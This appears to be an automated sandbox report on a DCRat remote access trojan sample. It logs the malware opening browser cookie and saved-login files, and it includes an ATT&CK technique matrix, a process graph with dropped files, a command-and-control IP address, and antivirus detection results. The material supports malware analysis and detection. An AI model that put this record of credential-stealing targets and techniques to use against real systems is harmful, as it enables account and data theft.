                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: updIMdPUj8.exe, type: SAMPLE
                          Source: Yara matchFile source: 5.0.hypersurrogateComponentdhcp.exe.ba0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.1842993642.0000000000BA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: updIMdPUj8.exe PID: 7324, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: hypersurrogateComponentdhcp.exe PID: 7600, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ZWgKQlTqcrSB.exe PID: 3300, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Recovery\csrss.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, type: DROPPED
                          Source: Yara matchFile source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		11
                          Scripting                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop Protocol2
                          Data from Local System                          		1
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Exploitation for Client Execution                          		Logon Script (Windows)Logon Script (Windows)3
                          Obfuscated Files or Information                          		Security Account Manager167
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		11
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts2
                          Command and Scripting Interpreter                          		Login HookLogin Hook1
                          Software Packing                          		NTDS361
                          Security Software Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts333
                          Masquerading                          		Cached Domain Credentials261
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                          Virtualization/Sandbox Evasion                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                          Process Injection                          		Proc Filesystem1
                          Remote System Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Network Configuration Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583613 Sample: updIMdPUj8.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus detection for dropped file 2->89 91 10 other signatures 2->91 10 updIMdPUj8.exe 3 6 2->10         started        13 svchost.exe 2->13         started        process3 dnsIp4 73 C:\...\hypersurrogateComponentdhcp.exe, PE32 10->73 dropped 75 wW6msodKQlyf4uIuEt...9vzHkuk0mZkwmTg.vbe, data 10->75 dropped 16 wscript.exe 1 10->16         started        79 127.0.0.1 unknown unknown 13->79 file5 process6 signatures7 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->81 83 Suspicious execution chain found 16->83 19 cmd.exe 1 16->19         started        process8 process9 21 hypersurrogateComponentdhcp.exe 3 40 19->21         started        25 conhost.exe 19->25         started        file10 57 C:\Windows\TAPI\ZWgKQlTqcrSB.exe, PE32 21->57 dropped 59 C:\Users\user\Desktop\zomqzklW.log, PE32 21->59 dropped 61 C:\Users\user\Desktop\zgCYVAKQ.log, PE32 21->61 dropped 63 27 other malicious files 21->63 dropped 93 Antivirus detection for dropped file 21->93 95 Multi AV Scanner detection for dropped file 21->95 97 Machine Learning detection for dropped file 21->97 99 4 other signatures 21->99 27 cmd.exe 21->27         started        30 powershell.exe 23 21->30         started        32 powershell.exe 23 21->32         started        34 3 other processes 21->34 signatures11 process12 signatures13 109 Uses ping.exe to sleep 27->109 111 Drops executables to the windows directory (C:\Windows) and starts them 27->111 113 Uses ping.exe to check the status of other devices and networks 27->113 36 ZWgKQlTqcrSB.exe 27->36         started        41 conhost.exe 27->41         started        55 2 other processes 27->55 115 Found many strings related to Crypto-Wallets (likely being stolen) 30->115 117 Loading BitLocker PowerShell Module 30->117 43 conhost.exe 30->43         started        45 conhost.exe 32->45         started        47 WmiPrvSE.exe 32->47         started        49 conhost.exe 34->49         started        51 conhost.exe 34->51         started        53 conhost.exe 34->53         started        process14 dnsIp15 77 86.110.194.28, 49736, 49737, 49738 RACKTECHRU Russian Federation 36->77 65 C:\Users\user\Desktop\yeGIODyj.log, PE32 36->65 dropped 67 C:\Users\user\Desktop\yViIeRfn.log, PE32 36->67 dropped 69 C:\Users\user\Desktop\tahrXlpt.log, PE32 36->69 dropped 71 21 other malicious files 36->71 dropped 101 Multi AV Scanner detection for dropped file 36->101 103 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 36->103 105 Found many strings related to Crypto-Wallets (likely being stolen) 36->105 107 2 other signatures 36->107 file16 signatures17

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          updIMdPUj8.exe58%VirustotalBrowse
                          updIMdPUj8.exe68%ReversingLabsWin32.Trojan.Uztuby
                          updIMdPUj8.exe100%AviraVBS/Runner.VPG
                          updIMdPUj8.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat100%AviraBAT/Delbat.C
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%AviraHEUR/AGEN.1309961
                          C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe100%AviraVBS/Runner.VPG
                          C:\Recovery\csrss.exe100%AviraHEUR/AGEN.1309961
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\KCawqqLw.log100%AviraTR/AVI.Agent.updqb
                          C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\IwSFjKJP.log100%AviraHEUR/AGEN.1300079
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\EOLhHxkb.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\DWtPcxKJ.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\ATGgGOGO.log100%Joe Sandbox ML
                          C:\Recovery\csrss.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%Joe Sandbox ML
                          C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\IwSFjKJP.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\GUTYNdlI.log100%Joe Sandbox ML
                          C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files\Adobe\ZWgKQlTqcrSB.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Recovery\csrss.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Users\user\Desktop\AQlYVRJc.log8%ReversingLabs
                          C:\Users\user\Desktop\ATGgGOGO.log8%ReversingLabs
                          C:\Users\user\Desktop\DWtPcxKJ.log5%ReversingLabs
                          C:\Users\user\Desktop\EOLhHxkb.log8%ReversingLabs
                          C:\Users\user\Desktop\EXjhrjDY.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
